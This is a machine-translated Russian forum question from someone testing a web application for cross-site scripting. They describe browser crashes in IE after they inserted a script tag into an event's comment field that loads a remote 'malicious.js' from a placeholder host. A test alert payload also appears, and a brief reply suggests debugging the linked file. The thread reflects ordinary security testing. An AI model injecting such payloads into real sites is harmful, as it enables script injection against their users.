Я тестирую веб-приложение против атаки xss. В том, что есть список событий, и каждый из них имеет комментарий область, в одном из событий, я вставил этот скрипт,Сбой веб-приложения из-за сценария XSS в IE, но не в google chrome, но оба браузера обрабатывают скрипт?
<script src=”http://www.example.com/malicious.js”></script >
Событие показало флаг, что есть комментарий, но он не получает отображается , Проблема здесь всякий раз, когда я нажимаю на это событие, приложение вылетает, и браузер дает «страницу восстановления».
Но в Chrome он принимает этот скрипт, отображает его как пустой комментарий (""), и его почему-то не разбивается?
Я сбрасываю настройки браузера в IE, но появляется та же проблема. Так из-за того, что Chrome не обрабатывает вирус (не уверен), или IE его обрабатывает?
И я попробовал этот сценарий,
<script >alert("Hello");</script >
Оба браузера действует в том же способами без сбоев.
Не могли бы вы дать мне представление о том, что происходит в нем?
Я также попытался использовать стандартные знаки четности, но то же самое происходит (я имею в виду крах). В этом скрипте, изменив кавычки , его не отображает предупреждение, но все равно отображается пустой комментарий. – 2013-03-14 14:02:46
В этом случае это может быть до кода в файле, который вы связываете. Попробуйте сохранить рабочий сценарий в файле, а затем выполните тот же метод в первом примере, с новым базовым файлом и посмотрите, не портится ли он. –
работает с командой предупреждения. Но какова проблема с тем, что при использовании этого кода , но хром в порядке – 2013-03-14 14:07:35